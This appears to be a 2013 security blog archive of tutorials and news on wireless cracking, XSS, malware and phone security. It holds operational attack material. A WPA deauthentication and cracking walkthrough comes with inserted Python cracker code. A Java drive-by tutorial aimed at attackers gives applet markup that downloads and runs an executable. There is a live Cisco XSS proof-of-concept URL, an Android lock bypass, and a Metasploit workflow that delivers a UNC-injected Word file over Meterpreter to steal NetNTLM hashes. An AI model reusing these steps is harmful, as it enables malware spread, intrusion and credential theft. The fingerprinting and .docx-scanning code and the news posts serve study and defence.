Friday, March 29, 2013

How To Crack A WPA Key With Aircrack-ng




With the growing popularity of wireless networks and mobile computing, an understanding of common wireless security issues has become necessary for home users and IT professionals alike. This article illustrates the most common practical weakness in WPA/WPA2-PSK deployments: a passphrase weak enough to be recovered by an offline dictionary attack against a captured handshake. It assumes basic familiarity with networking principles and terminology. To attack WPA/WPA2-PSK you first need to put your wireless card into "monitor" mode so it can passively capture frames without being associated with a network. One of the best free toolsets for monitoring wireless traffic and cracking WPA-PSK/WPA2-PSK keys is the aircrack-ng suite, which is used throughout this article. It has both Linux and Windows versions (provided your card is supported under Windows).

The network adapter used for WPA/WPA2 cracking here is an Alfa AWUS036H; the OS is BackTrack 5 R2.

Step 1 : Setting up your network device 

To capture traffic without being associated with an access point, the wireless card must be in monitor mode. First list the wireless interfaces and their status:
Command # iwconfig


Command # airmon-ng start wlan0 (puts the card into monitor mode; substitute your own interface name for wlan0. airmon-ng creates a separate monitor interface, typically mon0, which the following steps use)


Step 2 : Reconnaissance 

This step assumes the interface is already in monitor mode, which you can verify with iwconfig (the Mode field reads Monitor). Next, find the wireless networks in range and choose your target:

Command # airodump-ng mon0 (hops across all channels, listing the access points in range with their BSSID, channel and encryption, and the clients associated with each)


 Step 3 : Capturing Packets 

To capture data into a file, we use airodump-ng again with additional switches to lock onto a specific AP and channel. Assuming the monitor interface is mon0 and the target is on channel 1, the following writes a capture with the prefix data (airodump-ng appends a sequence number, so the packet capture ends up in data-01.cap):

Command # airodump-ng -c 1 --bssid AP_MAC -w data mon0 (where AP_MAC is the BSSID of the target access point)


Step 4 : De-Authentication Technique 

To crack a WPA-PSK network you need a capture containing the four-way handshake, which is only exchanged when a client (re)connects. Rather than waiting for one, you can deauthenticate an associated client so that it reconnects and performs the handshake while you are capturing:

Command # aireplay-ng --deauth 3 -a MAC_AP -c MAC_Client mon0 (sends three deauthentication bursts; MAC_AP is the MAC address of the access point, MAC_Client the MAC address of an associated client. Run this from a second terminal while the airodump-ng capture from Step 3 is still running.)


Once the handshake has been captured, airodump-ng shows "WPA handshake: <BSSID>" in the top-right corner of its output.


Step 5 : Cracking WPA/WPA2 

Once you have captured a four-way handshake, you also need a large, relevant dictionary file (commonly known as a wordlist) of candidate passphrases.

Command # aircrack-ng -w wordlist capture_file.cap (where wordlist is your dictionary file and capture_file.cap is the capture containing a valid WPA handshake, e.g. data-01.cap from Step 3)



Capturing the handshake is the quick part; the offline dictionary attack against it is the slow part, and it only succeeds when the passphrase is in your wordlist. Each candidate costs 4096 rounds of HMAC-SHA1 (WPA derives the pairwise master key from the passphrase and SSID with PBKDF2), so testing tens of millions of candidates takes hours on a CPU. Still, a weak, short, common or human-readable passphrase is typically broken within minutes, which is why a long random passphrase is the real defence.
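To make the cost model above concrete, here is an added example (not part of the original article, and not aircrack-ng's code) that implements the offline step in Python: derive the PMK with PBKDF2, expand it to the KCK, recompute the EAPOL MIC for each candidate passphrase and compare it with the one captured in message 2 of the handshake. The SSID, MAC addresses, nonces, EAPOL frame and wordlist are all constructed for the demo; against a real capture you would read them from data-01.cap.

```python
# Added example (not from the original article): the arithmetic aircrack-ng
# performs offline on a captured WPA2 four-way handshake. All network
# parameters below (SSID, MACs, nonces, EAPOL frame) are constructed for the
# demo, and the "wordlist" is an inline list standing in for a file.
import hashlib
import hmac


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """WPA-PSK: PMK = PBKDF2-HMAC-SHA1(passphrase, ssid, 4096 rounds, 32 bytes).
    These 4096 HMACs per candidate are the cost that makes cracking slow."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf512(key: bytes, label: bytes, data: bytes) -> bytes:
    """IEEE 802.11 PRF-512: HMAC-SHA1(key, label || 0x00 || data || i) for i = 0..3."""
    out = b"".join(
        hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range(4)
    )
    return out[:64]


def derive_kck(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK = PRF-512(PMK, "Pairwise key expansion", min/max of MACs and nonces).
    Its first 16 bytes are the KCK, the key that authenticates the EAPOL messages."""
    data = min(ap_mac, sta_mac) + max(ap_mac, sta_mac) + min(anonce, snonce) + max(anonce, snonce)
    return prf512(pmk, b"Pairwise key expansion", data)[:16]


def eapol_mic(kck: bytes, eapol_frame: bytes) -> bytes:
    """WPA2/CCMP (key descriptor version 2): MIC = HMAC-SHA1(KCK, frame with its
    16-byte MIC field zeroed)[:16]. The MIC field starts at offset 81 of an EAPOL-Key frame."""
    zeroed = eapol_frame[:81] + b"\x00" * 16 + eapol_frame[97:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def crack(ssid, ap_mac, sta_mac, anonce, snonce, eapol_frame, captured_mic, wordlist):
    """Offline dictionary attack: recompute the MIC for every candidate passphrase
    and compare it with the MIC sniffed from message 2 of the handshake."""
    for candidate in wordlist:
        kck = derive_kck(pmk_from_passphrase(candidate, ssid), ap_mac, sta_mac, anonce, snonce)
        if hmac.compare_digest(eapol_mic(kck, eapol_frame), captured_mic):
            return candidate
    return None


# --- Constructed handshake (stands in for data-01.cap) ---------------------
SSID = "Coffee-Guest"
AP_MAC = bytes.fromhex("00112233aabb")      # BSSID, as shown by airodump-ng
STA_MAC = bytes.fromhex("aabbccdd0011")     # associated client
ANONCE = bytes(range(32))                   # from message 1 (AP -> client)
SNONCE = bytes(range(32, 64))               # from message 2 (client -> AP)
# EAPOL-Key message 2: 4-byte EAPOL header, descriptor type, key info, key
# length, replay counter, SNonce, IV, RSC, ID, MIC (zeroed here), key data length.
EAPOL_M2 = (bytes.fromhex("0103005f02010a00000000000000000001")
            + SNONCE + bytes(32) + bytes(16) + b"\x00\x00")
REAL_PASSPHRASE = "sunshine1"               # deliberately weak, dictionary-grade
CAPTURED_MIC = eapol_mic(
    derive_kck(pmk_from_passphrase(REAL_PASSPHRASE, SSID), AP_MAC, STA_MAC, ANONCE, SNONCE),
    EAPOL_M2,
)
WORDLIST = ["password", "letmein", "123456789", "sunshine1", "correcthorse"]


if __name__ == "__main__":
    print("recovered passphrase:",
          crack(SSID, AP_MAC, STA_MAC, ANONCE, SNONCE, EAPOL_M2, CAPTURED_MIC, WORDLIST))
```

A good sanity check for pmk_from_passphrase is the IEEE 802.11 test vector (passphrase "password", SSID "IEEE" must give a PMK starting f42c6fc5). The attack never touches the network: everything after the capture is pure computation, which is why GPU crackers and rainbow tables for common SSIDs exist, and why a long random passphrase (or a unique SSID) is what actually protects a WPA2-PSK network.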

About The Author 

Shaharyar Shafiq is studying for a Bachelor's in Computer Engineering at Hamdard University. He holds the C|PTE (Certified Penetration Testing Engineer) certification and is interested in network penetration testing and forensics.

Thursday, March 28, 2013

Java Hits Another Roadblock - Found To Be A Threat For Browsers




Java has been the most talked-about application of the past couple of months, not for its functionality but because it keeps getting attacked and exploited. Oracle has released emergency security patches for the Java vulnerabilities, but exploits keep surfacing, from amateurs and experts alike, using a variety of tactics.


According to one report, about 100 million PCs are vulnerable to attacks that gain unauthorized access through outdated Java installations. As if things were not bad enough for the software already, the Department of Homeland Security has warned all PC users to disable Java on their systems.

Experts at Websense researched the topic and came up with a list of Java vulnerabilities, the versions affected and how widespread each is.


According to Websense:

It is probably no surprise that the largest single exploited vulnerability is the most recent one, with a vulnerable population of browsers at 93.77%. That's what the bad guys do: examine your security controls and find the easiest way to bypass them. Grabbing a copy of the latest version of Cool and using a pre-packaged exploit is a pretty low bar to go after such a large population of vulnerable browsers.


Most browsers are vulnerable to a much broader array of well-known Java holes, with over 75% using versions that are at least six months old, nearly two-thirds being more than a year out of date, and more than 50% of browsers are greater than two years behind the times with respect to Java vulnerabilities. And don't forget that if you're not on version 7 (which is 78.86% of you), Oracle won't be sending you any more updates even if new vulnerabilities are uncovered.

Cheers!

About the Author:
This article has been written by Dr. Sindhia Javed Junejo. She is one of the core members of RHA team.

Sunday, March 24, 2013

ASP.NET web-application Testing

Lens is an open-source ethical hacking tool specialised in penetration testing of ASP.NET web applications. It is written in WPF 4, and its modular internal architecture makes it easy to add new tests to the system.

The source code can be downloaded from:

http://ethicalhackingaspnet.codeplex.com/releases/view/52623

Currently the following tests are available:
(1) ViewState eavesdropping and information disclosure

(2) Session fixation

(3) Padding oracle



ASafaWeb


Automated Security Analyser for ASP.NET Websites. ASafaWeb makes HTTP requests to the target site and looks for responses that suggest configuration issues.


Wednesday, March 20, 2013

DOM Based XSS In Microsoft

           
Lately I have been researching DOM-based XSS. In my previous post I described a DOM-based XSS I found in AVG. DOM-based XSS is caused by a lack of input filtering in client-side JavaScript: an attacker-controlled source (such as location.hash or document.URL) reaches a sink (such as document.write or innerHTML) without sanitization. As more and more code moves to the client side, DOM-based XSS has become common, and experts predict it will occur mostly in websites that rely heavily on JavaScript.

I have reported several DOM-based XSS issues to Microsoft; most were due to missing input filtering/sanitization in third-party tracking scripts such as SiteCatalyst and riotracking, which often introduce vulnerable sources and sinks. With that said, let's look at the proof of concept of the attack:


The vulnerability is due to missing filtering in the riotracking script (line 58 of the script). Other Microsoft domains use the same tracking script and are vulnerable to the same DOM-based XSS; see if you can find one.


Tuesday, March 19, 2013

How Attackers Spread Malware With Java Drive by?


Hello RHA fans,

We are back with a new tutorial. Making a malicious program is one thing, but how do attackers spread it and hunt for victims? You may be disappointed to learn that the old tricks fail sometimes, as victims are now mostly aware of the old social engineering stuff. But cheer up, my friend, there is no end to it: I will show you a very effective method that attackers use to spread malicious viruses and worms.



In this tutorial RHA will show you how malware is spread with a JAVA DRIVE-BY.

What is java drive by:

A Java drive-by is a Java applet embedded in a web page. When the visitor clicks "Run" on the applet security pop-up, the applet downloads a program from the internet and executes it on the visitor's computer without any further permission prompt. The technique has been spotted in the wild being used to spread viruses and malware. The pop-up looks like the image below:

So what is the mechanism? A small piece of applet markup in the page's source produces the pop-up. Let's see how it is done.

Tools needed:

i) A .jar file, the main component. The author links to a download at http://www.mediafire.com/?mmafl2carb1s159
ii) A web host to upload the files to (the author uses a compromised site with a web shell), plus basic HTML knowledge to make an attractive page.
iii) The applet markup that ties it together.

Now upload the .jar file to the web host, then create the fake web page. How attractive you make it is up to you, but it must include the applet markup that produces the pop-up:

Applet markup: 

<APPLET CODE = "Client.class" ARCHIVE = "Client.jar" WIDTH = "0" HEIGHT = "0">
    <PARAM NAME = "AMLMAFOIEA" VALUE = "http://www.yoursite.com/virus.exe">
</APPLET>


Add the above markup to your fake page, replacing VALUE = "http://www.yoursite.com/virus.exe" with the URL of your own executable, as in the image below:

That is it: the simplest and most effective method attackers use to spread their malicious software.

 About the author

This article was written by Fahad Awan, the newest author on the RHA team. We wish him the best of luck with his tutorials.

Web-application Fingerprinting



Methods of Web Application Finger Printing

Historically, identifying open-source applications has been easy, because their behaviour and source code are public. In the early days it was as simple as looking in the page footer for text like "Powered by <XYZ>". As more server admins became aware of such giveaways and removed them, the pen tester's approach to identifying the web application running on a remote machine had to become more sophisticated.

HTML Data Inspection

This is the simplest method. Manually, you open the site in a browser and read its source; automated, your tool connects to the site, downloads the page and runs a set of regular expressions, each of which gives a yes/no answer. What we look for are patterns unique to a given web application, for example:

1) WordPress
Meta tags (e.g. the generator tag) and folder names such as wp-content and wp-includes
Folder names in the <link> elements
The evergreen "Powered by WordPress" notice at the bottom

2) OWA
URL pattern: http://<site_name>/OWA/

3) Joomla
URL pattern: http://<site_name>/component/

4) SharePoint Portal
URL pattern: /_layouts/*

Similarly, for the majority of applications we can create regular-expression rules to identify them.

These regular expressions can be combined into a monolithic tool that checks everything in one go, or into a pluggable architecture with one pattern file per application. Tools using this technique include browser plug-ins such as Wappalyzer and Web Technology Finder.

File and Folder Presence (HTTP response codes)

This approach does not analyse the page content. Instead it looks for obvious traces of an application by requesting known URLs directly and recording which exist and which do not. In the early days of the internet this was easy: fetch the headers, check for 200 OK or 404 Not Found, and you were done.

However, many sites now serve custom error pages and return 200 OK even when the page does not exist (a "soft 404"). This defeats the naive check, so the approach becomes:

1) Download the default page (200 OK).
2) Request a file that is guaranteed not to exist, save that response as the 404 template, and from then on treat any response that matches the template as "not found", whatever its status code.

With that baseline established, such tools look for known files and folders and use them to determine the application and, where possible, its exact version. For example, wp-login.php => WordPress; /owa/ => Microsoft Outlook Web App.

Checksum Based identification

This is a relatively new approach, considered by far the most accurate for identifying an application and its specific version. It works like this:

1) Compute checksums of the static files (scripts, stylesheets, images) shipped with each known version of an application and store them in a database.
2) Download the same static file from the remote server.
3) Compute its checksum.
4) Compare it against the database; a match identifies the application and version.

Disadvantages of Current automated Solutions

1) First and foremost, these tools are noisy, especially in auto-detection mode.
2) Large numbers of 404s can immediately trigger alarms in the target's monitoring.
3) They generally rely on the URL pattern you give them and fail to look beyond it. It might be the case that the main site links to a blog that has not been updated, and that could open the gates for us.
4) They lack human intuition.
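As an added example (not from the original article or any of the tools it names), the following Python script runs all three methods against a constructed WordPress-like target served by a stub http_get() function, so it runs offline. Note how the stub's soft 404 would make /administrator/ look like a Joomla hit to a naive status-code check, and how the learned 404 template filters it out. The patterns, paths and the single checksum are illustrative, not a signature database.

```python
# Added example (not from the original article): the three fingerprinting
# methods above run against a constructed WordPress-like target. http_get()
# stands in for a real HTTP client so the script runs offline; the paths,
# patterns and the single checksum are illustrative, not a real signature DB.
import hashlib
import re

SOFT_404 = "<html><head><title>Oops</title></head><body>Page not found</body></html>"
README = "<html><body><h1>WordPress</h1><p>Version 3.5.1</p></body></html>"  # constructed
SITE = {  # constructed target: every unknown path returns SOFT_404 with status 200
    "/": ('<html><head><meta name="generator" content="WordPress 3.5.1" />'
          '<link rel="stylesheet" href="/wp-content/themes/twentytwelve/style.css" />'
          '</head><body><p>Proudly powered by WordPress</p></body></html>'),
    "/wp-login.php": '<html><body><form id="loginform"></form></body></html>',
    "/readme.html": README,
}


def http_get(path):
    """Stand-in for an HTTP client: returns (status, body) from the constructed site."""
    return (200, SITE[path]) if path in SITE else (200, SOFT_404)


def sha1(text):
    return hashlib.sha1(text.encode()).hexdigest()


# Method 1: HTML data inspection. One regex list per application; the score is
# the number of patterns that matched.
HTML_PATTERNS = {
    "WordPress":  [r'<meta name="generator" content="WordPress', r'/wp-content/', r'[Pp]owered by WordPress'],
    "Joomla":     [r'<meta name="generator" content="Joomla', r'/component/'],
    "SharePoint": [r'/_layouts/'],
    "OWA":        [r'/owa/'],
}


def inspect_html(body):
    hits = {app: sum(1 for p in pats if re.search(p, body)) for app, pats in HTML_PATTERNS.items()}
    return {app: n for app, n in hits.items() if n}


# Method 2: file/folder presence with a learned 404 template. A soft 404 (200 OK
# for a missing page) would otherwise make every probe look like a hit.
KNOWN_PATHS = {"/wp-login.php": "WordPress", "/administrator/": "Joomla",
               "/owa/": "OWA", "/_layouts/": "SharePoint"}


def probe_paths(get):
    _, miss_body = get("/this-path-should-never-exist-7f3a9c1e")
    template = sha1(miss_body)                      # fingerprint of the site's "not found" page
    found = {}
    for path, app in KNOWN_PATHS.items():
        status, body = get(path)
        if status == 200 and sha1(body) != template:   # differs from the 404 template: real hit
            found[path] = app
    return found


# Method 3: checksum of a static file. Here the DB holds one entry computed
# from the constructed readme; a real DB is built from every release's files.
CHECKSUM_DB = {sha1(README): ("WordPress", "3.5.1")}


def checksum_identify(get, path="/readme.html"):
    _, body = get(path)
    return CHECKSUM_DB.get(sha1(body))


def fingerprint(get):
    return {"html": inspect_html(get("/")[1]),
            "paths": probe_paths(get),
            "checksum": checksum_identify(get)}


if __name__ == "__main__":
    print(fingerprint(http_get))
```

Swapping http_get() for a real client (urllib or requests) is the only change needed to point this at a live host; the disadvantages listed above then apply, since probe_paths() alone generates five requests, four of them to paths that a WAF or IDS will happily log as scanning.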

Friday, March 15, 2013

Cisco ZeroClipboard Swf File XSS


The security of the target website depends upon the number of attack vectors an attacker knows: the more vectors an attacker knows, the more chances he has of compromising your website. One of the reasons why I have managed to secure my place in most of the security halls of fame is that I did not try a single attack vector; I tested the target for lots of different attack vectors, one of them being SWF. SWF files are commonly found on most websites. Though there are lots of other vulnerabilities in SWF files, I will stick to the topic of this post and leave the others for upcoming posts.
Recently, I was testing Cisco for potential vulnerabilities. Initially I tested for SQLi, XSS, CSRF and other attacks, but was out of luck. Therefore, I decided to test it for SWF file vulnerabilities. One of the common SWF vulnerabilities I look for on a website is the "ZeroClipboard XSS".

What Is ZeroClipboard?

The ZeroClipboard library provides an easy way to copy text to the clipboard using an invisible Adobe Flash movie, and a JavaScript interface. The "Zero" signifies that the library is invisible and the user interface is left entirely up to you.


I used Google to search whether any of Cisco's subdomains or cisco.com itself contained this file. Luckily, I found the path on bx.cisco.com that contained ZeroClipboard.swf, so I began testing for XSS, and bingo, it worked.


Cisco Swf POC

http://bx.cisco.com/cbx-portal/js/zeroclipboard/ZeroClipboard.swf#?id=\"))}catch(e){alert(/XSSbyrafay/.source);}//&width=500&height=500


Vulnerable Code

public function ZeroClipboard()
{
    ....
    var flashvars:Object = LoaderInfo(this.root.loaderInfo).parameters;
    id = flashvars.id;
    ....
    ExternalInterface.call("ZeroClipboard.dispatch", id, "load", null);

As you can see from the code above, the id flashvar is read straight from the URL parameters and passed as the second argument to ExternalInterface.call without being sanitized. ExternalInterface.call serialises its arguments into a JavaScript string that is evaluated in the embedding page, so an id containing a quote and closing brackets, as in the PoC above, breaks out of the generated string and runs attacker-controlled JavaScript: an XSS in the context of bx.cisco.com.

Further Reading

If you are really interested in learning about zeroclipboard xss, i would recommend you read the following articles:

http://lcamtuf.blogspot.com/2011/03/other-reason-to-beware-of.html
https://github.com/jonrohan/ZeroClipboard/issues/14

Thursday, March 14, 2013

Vulnerability Discovered In iPhone - Poses Serious Threat To Users



Another vulnerability has been discovered in iOS that could allow attackers to remotely control an iPhone. Skycure, an Israeli company, describes it as a major flaw in how iOS handles configuration profiles, one that opens the door to malware.

The attack abuses .mobileconfig files, the configuration profiles that carriers use to set system-level settings including Wi-Fi, VPN, email and APN.

Skycure's CEO, Adi Sharabani, demonstrated the exploit, showing how an iPhone can be controlled while the victim's location and other sensitive information are retrieved.




Ways to get infected:


  1. Victims browse to an attacker-controlled website, which promises them free access to popular movies and TV-shows. In order to get the free access, “all they have to do” is to install an iOS profile that will “configure” their devices accordingly.
  2. Victims receive a mail that promises them a “better battery performance” or just “something cool to watch” upon installation.




To avoid this attack one must follow these rules:


  • You should only install profiles from trusted websites or applications.
  • Make sure you download profiles via a secure channel (e.g., use profile links that start with https and not http).
  • Beware of non-verified mobileconfigs. While a verified profile isn't necessarily a safe one, a non-verified one should certainly raise your suspicion.

Cheers!

About the Author:
This article has been written by Dr. Sindhia Javed Junejo. She is one of the core members of RHA team.

Wednesday, March 13, 2013

600% Increase In Cyber Attacks: WebSense Releases Threat Report 2013

One thing I love more than writing is online threat reports - all the blood, sweat and tears combined with the satisfaction of discovery and elimination of the threat. Ahh! The moment you come to the realisation that there are smarter people in this world who can shoot you point-blank without ever being caught. Yes, brutality is the name, the name of the game!


WebSense has kept up to speed in this game and they have released a report to show for it. WebSense has released the 2013 Threat report enumerating an analysis on cyber threats. According to WebSense, cyber threats have increased over the years due to usage of ancient security protocols. Attackers are able to easily bypass these mechanisms and target mobile platforms and social media, the two most celebrated inventions of this century.

Internet has been reported to be the 'attack vector and the primary support element of other attack trajectories'. Malicious websites have grown in number (almost 600%) and 85% of these are being hosted by legitimate but compromised providers.

The categories of sites most often attacked were:

  • Information Technology
  • Business and Economy
  • Sex
  • Travel
  • Shopping

Probably because attackers wanted to cover all areas of human psyche and, in general, life? No wonder the number of threats and attacks have increased.

- Social Media was one of the most exploited channels due to its large audience. Most of the links consisted of malicious content which were spread through the network. New features and interfaces also resulted in some amount of confusion leading to successful attacks on the user.

- Mobile platforms were again easily attacked, through jailbreaking and the download and installation of malicious apps.

Legitimate apps were also a cause for concern; many proved less secure than expected. Consider a study by Philipps University and Leibniz University in Germany involving 13,500 free apps downloaded from Google Play. Researchers found that 8 percent of these apps were vulnerable to man-in-the-middle attacks, and approximately 40 percent enabled the researchers to capture credentials for American Express, Diners Club, Paypal, bank accounts, Facebook,Twitter, Google, Yahoo, Microsoft Live ID, Box, WordPress, remote control servers, arbitrary email accounts, and IBM Sametime, among others.
WebSense stated that malicious apps mainly require three permissions:
  • 82% of malicious apps send, receive, read or write SMS message.
  • 12.5% malicious apps require RECEIVE_WAP_PUSH permission.
  • 10% malicious apps asked for permission to install other apps.
- Email was another vector that came to WebSense's notice, as only 20% of the emails sent and received were legitimate; 80% were phishing and spam. It is very easy to fall prey to such attacks because the links in these emails appear to come from "real people" but lead to compromised websites, or the attachments they carry are infected.


Report also introduced "time-delay" attack, "in which embedded web links are kept benign until after traditional email security defences are bypassed".

According to WebSense the following categories of malicious web links are present in Spam Email:
  • Potentially Damaging Content | Suspicious sites with little or no useful content.
  • Web and Email Spam | Sites used in unsolicited commercial email.
  • Malicious Websites | Sites containing malicious code.
  • Phishing and other Frauds | Sites that counterfeit legitimate sites to elicit user information.
  • Malicious Embedded iFrame.
You can read the full report by WebSense which clearly states;

“Solutions that focus solely on mobile, email, web or otherwise can no longer be trusted to defend against complex, multistage attacks that can move between attack vectors.”

Wise friends, we are no longer... ALONE!

Cheers!

About the Author:
This article has been written by Dr. Sindhia Javed Junejo. She is one of the core members of RHA team.

Sunday, March 10, 2013

Vulnerabilities Fixed in App Store Almost After A Year


It is being reported that Apple ignored a security problem in its App Store network for more than a year after a Google developer pointed it out.

Google researcher Elie Bursztein stated on his blog that he had informed Apple of security problems in the App Store that allowed attackers to steal passwords and install unwanted or expensive applications.
These attacks exploited Apple's failure to encrypt the App Store connection when an iDevice logged in: because the traffic went over plain HTTP, an attacker on the same network could intercept the communication between the device and the App Store and insert his own content.

The vulnerability could be exploited to carry out quite a few attacks on the user according to Elie:
Password stealing: Trick the user into disclosing his or her password by using the application update notification mechanism to insert a fake prompt when the App Store is launched.
App swapping: Force the user to install/buy the attacker’s app of choice instead of the one the user intended to install/buy. It is possible to swap a free app with a paid app.
App fake upgrade: Trick the user into installing/buying the attacker’s app of choice by inserting fake app upgrades, or manipulating existing app upgrades.
Preventing application installation: Prevent the user from installing/upgrading applications either by stripping the app out of the market or tricking the app into believing it is already installed.
Privacy leak: The App Store application update mechanism discloses in the clear the list of the applications installed on the device.

Apple responded to Elie's reports by switching on HTTPS for App Store only last week after a year of stalling appropriate decisions.

Cheers!

About the Author:
This article has been written by Dr. Sindhia Javed Junejo. She is one of the core members of RHA team.

Friday, March 8, 2013

How To Dodge Android 4.1.2 Passcode Lock - Vulnerability Exploited And Explained


Do you want to get past the Galaxy Note II's lock screen, even for a brief moment? With iOS 6.1.2 having been owned by hackers, it was time someone took a look at Android's vulnerabilities.

The method that we are going to explain to you to bypass Android's security was found by Terence Eden on Samsung Galaxy Note II running Android 4.1.2. It allows users to temporarily get around the phone's lock screen without a password.


You can bypass the Note II's lock screen by following the steps below:

1. Make sure your device is locked.

2. Activate the screen.

3. Enter "Emergency Call".

4. Tap on the "ICE" button found on the bottom left.

5. Press and hold the home button for a few seconds and then release it.

6. The phone's home screen will be displayed.

7. While the home screen is visible click on any app or widget and it will launch without the password.

You can view messages or emails via this method briefly. It has also been reported that not all apps are vulnerable to this exploit.

Disclaimer: We request our readers to attempt the above hack at their own risk and for their own knowledge.

Cheers!

About the Author:
This article has been written by Dr. Sindhia Javed Junejo. She is one of the core members of RHA team.

Microsoft Word UNC Path Injector

This Metasploit module modifies a .docx file so that, upon opening, Word submits the user's stored NetNTLM credentials to a remote host: the document references a UNC path on the attacker's server, and Windows authenticates to it automatically. The module can also create a new, otherwise empty .docx. If emailed, the recipient must put the document into editing mode before the remote server is contacted; preview and read-only mode do not trigger it. Verified to work with Microsoft Word 2003, 2007 and 2010 as of January 2013. The hashes are collected with the auxiliary/server/capture/smb module.

The document must be opened by the victim. The author delivers it through an existing Meterpreter session on the victim's PC (obtained beforehand); emailing it works as well, with the caveat above.

msfconsole

use auxiliary/docx/word_unc_injector

msf auxiliary(word_unc_injector) > set LHOST 192.168.1.2   (IP of the attacker's host that will capture the hashes)

msf auxiliary(word_unc_injector) > run

The module generates the malicious .docx and stores it locally:

/root/.msf4/local/msf.docx

From the Meterpreter session, use the upload command to place msf.docx on the victim's PC:

upload /root/.msf4/local/msf.docx

Then start the SMB capture server:

use auxiliary/server/capture/smb

msf auxiliary(smb) > run

When the victim opens msf.docx, Word connects to the UNC path and the capture server records the NetNTLM challenge/response hashes. These can be cracked offline or tried against other hosts where the same credentials are in use.
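The following added example (not part of the original post or of the Metasploit module) shows the defensive side of the same mechanism. Office documents are zip archives whose *.rels parts describe links to other parts, and a relationship with TargetMode="External" whose target is a UNC path is what makes Word reach out over SMB when the document is opened. The script constructs a sample .docx of that shape (the attached-template relationship it uses is an assumption about the module's output, which this page does not show) and then scans any .docx for such relationships.

```python
# Added example (not from the original post): a scanner for the kind of
# document the module above produces. Office documents are zip archives whose
# *.rels parts link to other parts; a relationship with TargetMode="External"
# pointing at a UNC path makes Word reach out over SMB when the document is
# opened. build_sample_docx() constructs such a file for the demo; the exact
# relationship Metasploit writes is not shown on this page, so the sample uses
# an attached-template relationship as an assumption about its shape.
import io
import xml.etree.ElementTree as ET
import zipfile

RELS_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
REL_TEMPLATE = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate"
REL_DOCUMENT = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/officeDocument"
W_NS = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"
R_NS = "http://schemas.openxmlformats.org/officeDocument/2006/relationships"


def build_sample_docx(template_target: str) -> bytes:
    """Constructed minimal .docx whose settings part attaches an external template."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml",
                   '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
                   '<Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>'
                   '<Default Extension="xml" ContentType="application/xml"/></Types>')
        z.writestr("_rels/.rels",                      # internal relationship: must NOT be flagged
                   f'<Relationships xmlns="{RELS_NS}">'
                   f'<Relationship Id="rId1" Type="{REL_DOCUMENT}" Target="word/document.xml"/>'
                   '</Relationships>')
        z.writestr("word/document.xml",
                   f'<w:document xmlns:w="{W_NS}"><w:body><w:p/></w:body></w:document>')
        z.writestr("word/settings.xml",
                   f'<w:settings xmlns:w="{W_NS}" xmlns:r="{R_NS}">'
                   '<w:attachedTemplate r:id="rId1"/></w:settings>')
        z.writestr("word/_rels/settings.xml.rels",     # external relationship: the injection point
                   f'<Relationships xmlns="{RELS_NS}">'
                   f'<Relationship Id="rId1" Type="{REL_TEMPLATE}" Target="{template_target}" TargetMode="External"/>'
                   '</Relationships>')
    return buf.getvalue()


def is_unc_like(target: str) -> bool:
    """UNC paths (\\\\host\\share), protocol-relative //host/share and file: URLs all
    resolve through the Windows redirector and can trigger SMB authentication."""
    t = target.strip()
    return t.startswith("\\\\") or t.startswith("//") or t.lower().startswith("file:")


def find_unc_relationships(docx_bytes: bytes):
    """Return (part, Id, Target) for every external relationship with a UNC-style target."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        for name in z.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(z.read(name))
            for rel in root.iter(f"{{{RELS_NS}}}Relationship"):
                if rel.get("TargetMode") == "External" and is_unc_like(rel.get("Target", "")):
                    hits.append((name, rel.get("Id"), rel.get("Target")))
    return hits


if __name__ == "__main__":
    sample = build_sample_docx(r"\\192.168.1.2\share\normal.dotm")
    for part, rel_id, target in find_unc_relationships(sample):
        print(f"{part}: {rel_id} -> {target}")
```

Run find_unc_relationships() over attachments at the mail gateway and you catch this class of document regardless of which part carries the relationship (settings, the document body, a header, an embedded image link). On the network side, the fix that removes the whole class is blocking outbound SMB (TCP 445) at the perimeter, which the page's capture server relies on being allowed.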

Thursday, March 7, 2013

The Rise Of Ethical Hackers - Let The Bounty Hunting Begin!


Well, well well! It seems like our own favourite ethical hacker, Rafay Baloch, is about to meet the clan  with whom he shares his talents! If you still haven't figured out who R.B is, please do your homework before falling in love with us! (yes, I said it!)

Security researchers and ethical hackers are gathering in Vancouver for the CanSecWest conference at this time of year. The crowd will be equipped and ready to hunt down every vulnerability they can in Chrome, Internet Explorer and Java (good riddance, since Java has been attacked over and over since 2013 began), and in doing so they can bag generous cash prizes.


Pwn2Own is organising the event offering over half a million dollars in cash prizes for anyone who successfully attempts to ethically hack a selected target.

The rules are simple:

1. Vulnerability has to be previously unknown.
2. Computers should be running fully patched versions of Windows 7, 8 and OS X Mountain Lion
3. A full sandbox (if present) escape is required to win.

Rules and Regulations from Pwn2Own can be found on their link.

The list of targets and the cash prizes to be won are:

  • Web Browser
    • Google Chrome on Windows 7: $100,000 plus the compromised laptop (estimated at $2,000) and 20,000 ZDI reward points (estimated at $10,000)
    • Microsoft Internet Explorer, either:
      • IE 10 on Windows 8: $100,000 plus the compromised laptop (estimated at $2,000) and 20,000 ZDI reward points (estimated at $10,000), or
      • IE 9 on Windows 7:  $75,000 plus the compromised laptop (estimated at $2,000) and 20,000 ZDI reward points (estimated at $10,000)
    • Mozilla Firefox on Windows 7:  $60,000 plus the compromised laptop (estimated at $2,000) and 20,000 ZDI reward points (estimated at $10,000)
    • Apple Safari on OS X Mountain Lion:  $65,000 plus the compromised laptop (estimated at $2,000) and 20,000 ZDI reward points (estimated at $10,000)
  • Web Browser Plug-ins using Internet Explorer 9 on Windows 7
    • Adobe Reader XI ($70,000) plus the compromised laptop (estimated at $2,000) and 20,000 ZDI reward points (estimated at $10,000)
